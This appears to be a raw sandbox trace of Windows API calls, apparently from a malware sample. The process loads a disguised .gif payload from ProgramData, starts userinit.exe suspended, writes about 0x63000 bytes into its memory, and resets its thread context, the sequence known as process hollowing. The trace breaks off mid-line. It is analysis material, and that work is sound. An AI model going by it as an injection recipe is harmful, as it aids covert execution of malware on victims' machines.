[0106.901] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8
[0106.901] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e678*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e678*=0) returned 0x0
[0106.901] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0106.901] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x5e000
[0106.901] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0106.903] GlobalLock (hMem=0x950004) returned 0x33d8b0
[0106.903] ReadFile (in: hFile=0xf8, lpBuffer=0x33d8b0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0x12e68c, lpOverlapped=0x0 | out: lpBuffer=0x33d8b0*, lpNumberOfBytesRead=0x12e68c*=0x5e000, lpOverlapped=0x0) returned 1
[0106.911] CloseHandle (hObject=0xf8) returned 1
[0106.911] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.912] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.912] GlobalUnlock (hMem=0x95000c) returned 0
[0106.912] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4000, uFlags=0x2) returned 0x95000c
[0106.912] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.913] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.913] GlobalUnlock (hMem=0x95000c) returned 0
[0106.913] GlobalReAlloc (hMem=0x95000c, dwBytes=0x6000, uFlags=0x2) returned 0x95000c
[0106.913] GlobalLock (hMem=0x95000c) returned 0x39f8d0
[0106.914] GlobalHandle (pMem=0x39f8d0) returned 0x95000c
[0106.914] GlobalUnlock (hMem=0x95000c) returned 0
[0106.914] GlobalReAlloc (hMem=0x95000c, dwBytes=0x8000, uFlags=0x2) returned 0x95000c
[0106.915] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0106.916] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0106.916] GlobalUnlock (hMem=0x95000c) returned 0
[0106.916] GlobalReAlloc (hMem=0x95000c, dwBytes=0xa000, uFlags=0x2) returned 0x95000c
[0106.916] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0106.917] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0106.917] GlobalUnlock (hMem=0x95000c) returned 0
[0106.917] GlobalReAlloc (hMem=0x95000c, dwBytes=0xc000, uFlags=0x2) returned 0x95000c
[0106.917] GlobalLock (hMem=0x95000c) returned 0x3af8f0
[0106.918] GlobalHandle (pMem=0x3af8f0) returned 0x95000c
[0106.918] GlobalUnlock (hMem=0x95000c) returned 0
[0106.918] GlobalReAlloc (hMem=0x95000c, dwBytes=0xe000, uFlags=0x2) returned 0x95000c
[0106.919] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.920] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.920] GlobalUnlock (hMem=0x95000c) returned 0
[0106.920] GlobalReAlloc (hMem=0x95000c, dwBytes=0x10000, uFlags=0x2) returned 0x95000c
[0106.921] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.921] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.921] GlobalUnlock (hMem=0x95000c) returned 0
[0106.921] GlobalReAlloc (hMem=0x95000c, dwBytes=0x12000, uFlags=0x2) returned 0x95000c
[0106.922] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.922] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.922] GlobalUnlock (hMem=0x95000c) returned 0
[0106.922] GlobalReAlloc (hMem=0x95000c, dwBytes=0x14000, uFlags=0x2) returned 0x95000c
[0106.923] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.923] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.923] GlobalUnlock (hMem=0x95000c) returned 0
[0106.924] GlobalReAlloc (hMem=0x95000c, dwBytes=0x16000, uFlags=0x2) returned 0x95000c
[0106.924] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.924] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.925] GlobalUnlock (hMem=0x95000c) returned 0
[0106.925] GlobalReAlloc (hMem=0x95000c, dwBytes=0x18000, uFlags=0x2) returned 0x95000c
[0106.925] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.925] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.925] GlobalUnlock (hMem=0x95000c) returned 0
[0106.926] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1a000, uFlags=0x2) returned 0x95000c
[0106.926] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.926] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.926] GlobalUnlock (hMem=0x95000c) returned 0
[0106.927] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1c000, uFlags=0x2) returned 0x95000c
[0106.927] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.927] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.927] GlobalUnlock (hMem=0x95000c) returned 0
[0106.927] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1e000, uFlags=0x2) returned 0x95000c
[0106.928] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.928] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.928] GlobalUnlock (hMem=0x95000c) returned 0
[0106.928] GlobalReAlloc (hMem=0x95000c, dwBytes=0x20000, uFlags=0x2) returned 0x95000c
[0106.928] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.929] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.929] GlobalUnlock (hMem=0x95000c) returned 0
[0106.929] GlobalReAlloc (hMem=0x95000c, dwBytes=0x22000, uFlags=0x2) returned 0x95000c
[0106.931] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0106.932] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0106.932] GlobalUnlock (hMem=0x95000c) returned 0
[0106.932] GlobalReAlloc (hMem=0x95000c, dwBytes=0x24000, uFlags=0x2) returned 0x95000c
[0106.932] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0106.933] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0106.933] GlobalUnlock (hMem=0x95000c) returned 0
[0106.933] GlobalReAlloc (hMem=0x95000c, dwBytes=0x26000, uFlags=0x2) returned 0x95000c
[0106.935] GlobalLock (hMem=0x95000c) returned 0x3df8e0
[0106.936] GlobalHandle (pMem=0x3df8e0) returned 0x95000c
[0106.936] GlobalUnlock (hMem=0x95000c) returned 0
[0106.936] GlobalReAlloc (hMem=0x95000c, dwBytes=0x28000, uFlags=0x2) returned 0x95000c
[0106.936] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.937] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.937] GlobalUnlock (hMem=0x95000c) returned 0
[0106.937] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2a000, uFlags=0x2) returned 0x95000c
[0106.937] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.938] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.938] GlobalUnlock (hMem=0x95000c) returned 0
[0106.938] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2c000, uFlags=0x2) returned 0x95000c
[0106.938] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.939] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.939] GlobalUnlock (hMem=0x95000c) returned 0
[0106.939] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2e000, uFlags=0x2) returned 0x95000c
[0106.939] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.940] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.940] GlobalUnlock (hMem=0x95000c) returned 0
[0106.940] GlobalReAlloc (hMem=0x95000c, dwBytes=0x30000, uFlags=0x2) returned 0x95000c
[0106.940] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.940] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.940] GlobalUnlock (hMem=0x95000c) returned 0
[0106.941] GlobalReAlloc (hMem=0x95000c, dwBytes=0x32000, uFlags=0x2) returned 0x95000c
[0106.941] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.941] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.941] GlobalUnlock (hMem=0x95000c) returned 0
[0106.941] GlobalReAlloc (hMem=0x95000c, dwBytes=0x34000, uFlags=0x2) returned 0x95000c
[0106.941] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.942] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.942] GlobalUnlock (hMem=0x95000c) returned 0
[0106.942] GlobalReAlloc (hMem=0x95000c, dwBytes=0x36000, uFlags=0x2) returned 0x95000c
[0106.942] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.943] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.943] GlobalUnlock (hMem=0x95000c) returned 0
[0106.943] GlobalReAlloc (hMem=0x95000c, dwBytes=0x38000, uFlags=0x2) returned 0x95000c
[0106.943] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.944] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.944] GlobalUnlock (hMem=0x95000c) returned 0
[0106.944] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3a000, uFlags=0x2) returned 0x95000c
[0106.944] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.945] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.945] GlobalUnlock (hMem=0x95000c) returned 0
[0106.945] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3c000, uFlags=0x2) returned 0x95000c
[0106.945] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.946] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.946] GlobalUnlock (hMem=0x95000c) returned 0
[0106.946] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3e000, uFlags=0x2) returned 0x95000c
[0106.946] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.948] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.948] GlobalUnlock (hMem=0x95000c) returned 0
[0106.948] GlobalReAlloc (hMem=0x95000c, dwBytes=0x40000, uFlags=0x2) returned 0x95000c
[0106.948] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.949] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.949] GlobalUnlock (hMem=0x95000c) returned 0
[0106.949] GlobalReAlloc (hMem=0x95000c, dwBytes=0x42000, uFlags=0x2) returned 0x95000c
[0106.949] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.950] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.950] GlobalUnlock (hMem=0x95000c) returned 0
[0106.950] GlobalReAlloc (hMem=0x95000c, dwBytes=0x44000, uFlags=0x2) returned 0x95000c
[0106.950] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.950] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.950] GlobalUnlock (hMem=0x95000c) returned 0
[0106.950] GlobalReAlloc (hMem=0x95000c, dwBytes=0x46000, uFlags=0x2) returned 0x95000c
[0106.951] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.951] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.951] GlobalUnlock (hMem=0x95000c) returned 0
[0106.951] GlobalReAlloc (hMem=0x95000c, dwBytes=0x48000, uFlags=0x2) returned 0x95000c
[0106.951] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.952] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.952] GlobalUnlock (hMem=0x95000c) returned 0
[0106.952] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4a000, uFlags=0x2) returned 0x95000c
[0106.952] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.953] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.953] GlobalUnlock (hMem=0x95000c) returned 0
[0106.953] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4c000, uFlags=0x2) returned 0x95000c
[0106.953] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.954] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.954] GlobalUnlock (hMem=0x95000c) returned 0
[0106.954] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4e000, uFlags=0x2) returned 0x95000c
[0106.954] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.955] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.955] GlobalUnlock (hMem=0x95000c) returned 0
[0106.955] GlobalReAlloc (hMem=0x95000c, dwBytes=0x50000, uFlags=0x2) returned 0x95000c
[0106.955] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.956] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.956] GlobalUnlock (hMem=0x95000c) returned 0
[0106.956] GlobalReAlloc (hMem=0x95000c, dwBytes=0x52000, uFlags=0x2) returned 0x95000c
[0106.956] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.957] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.957] GlobalUnlock (hMem=0x95000c) returned 0
[0106.957] GlobalReAlloc (hMem=0x95000c, dwBytes=0x54000, uFlags=0x2) returned 0x95000c
[0106.957] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.958] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.958] GlobalUnlock (hMem=0x95000c) returned 0
[0106.958] GlobalReAlloc (hMem=0x95000c, dwBytes=0x56000, uFlags=0x2) returned 0x95000c
[0106.958] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.959] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.959] GlobalUnlock (hMem=0x95000c) returned 0
[0106.959] GlobalReAlloc (hMem=0x95000c, dwBytes=0x58000, uFlags=0x2) returned 0x95000c
[0106.959] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.959] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.959] GlobalUnlock (hMem=0x95000c) returned 0
[0106.960] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5a000, uFlags=0x2) returned 0x95000c
[0106.960] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.960] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.960] GlobalUnlock (hMem=0x95000c) returned 0
[0106.960] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5c000, uFlags=0x2) returned 0x95000c
[0106.960] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.961] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0106.961] GlobalUnlock (hMem=0x95000c) returned 0
[0106.961] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5e000, uFlags=0x2) returned 0x95000c
[0106.961] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0106.962] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x580c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x580c10 | out: lpCommandLine="", lpProcessInformation=0x580c10*(hProcess=0xf4, hThread=0xf8, dwProcessId=0xf9c, dwThreadId=0xfa0)) returned 1
[0106.965] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x9d0000
[0106.965] GetThreadContext (in: hThread=0xf8, lpContext=0x9d0000 | out: lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd8000, Edx=0x0, Ecx=0x0, Eax=0xfe2be9, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x24fc90, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0106.965] ReadProcessMemory (in: hProcess=0xf4, lpBaseAddress=0x7ffd8008, lpBuffer=0x580c74, nSize=0x4, lpNumberOfBytesRead=0x580c7c | out: lpBuffer=0x580c74*, lpNumberOfBytesRead=0x580c7c*=0x4) returned 1
[0106.966] VirtualAllocEx (hProcess=0xf4, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0106.966] VirtualAlloc (lpAddress=0x18b8000, dwSize=0x64000, flAllocationType=0x1000, flProtect=0x4) returned 0x18b8000
[0106.972] WriteProcessMemory (in: hProcess=0xf4, lpBaseAddress=0x400000, lpBuffer=0x18b6538*, nSize=0x63000, lpNumberOfBytesWritten=0x580c7c | out: lpBuffer=0x18b6538*, lpNumberOfBytesWritten=0x580c7c*=0x63000) returned 1
[0106.991] WriteProcessMemory (in: hProcess=0xf4, lpBaseAddress=0x7ffd8008, lpBuffer=0x580c78*, nSize=0x4, lpNumberOfBytesWritten=0x580c7c | out: lpBuffer=0x580c78*, lpNumberOfBytesWritten=0x580c7c*=0x4) returned 1
[0106.991] SetThreadContext (hThread=0xf8, lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, 